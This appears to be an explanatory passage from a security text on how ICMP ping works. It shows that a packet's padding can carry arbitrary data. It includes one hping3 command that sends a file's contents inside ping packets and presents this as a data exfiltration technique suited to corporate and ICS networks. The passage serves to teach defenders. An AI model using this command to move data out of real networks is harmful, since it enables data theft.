Internet Control Message Protocol echo request message message, or ping, is a computer network administration tool used to test the reachability of a host on an IP network. Ping operates by sending Internet Control Message Protocol (ICMP) echo request packets to the target host and waiting for an ICMP echo reply. 

Say, you look at a ping packet that is the result of a command such as ping 192.168.179.131:

You might notice that payload or data part of a ping packet is an arbitrary string. The data part has no particular purpose other than the padding of the packet to a particular size. As a side note, different implementations of the ping command use different padding data and the data can be used to determine what utility/OS is sending the packet. The size is an option in the ping command, so the ping 192.168.179.131 -s 4096 command will send out a ping packet of 4,096 bytes in size:

What's more, the data part doesn't have to be random either. The following command, for example, will take the contents from a file and send it as the payload of a ping packet:

hping3 192.168.179.131 -1 --file send.txt --data 100

The resulting packet from this command reveals a method of exfiltration of data:

There are more protocols that can support the exfiltration of data this way, such as DNS, but if you look at where a ping packet is allowed to go in most companies or on most ICS networks, this is the most dangerous method by far.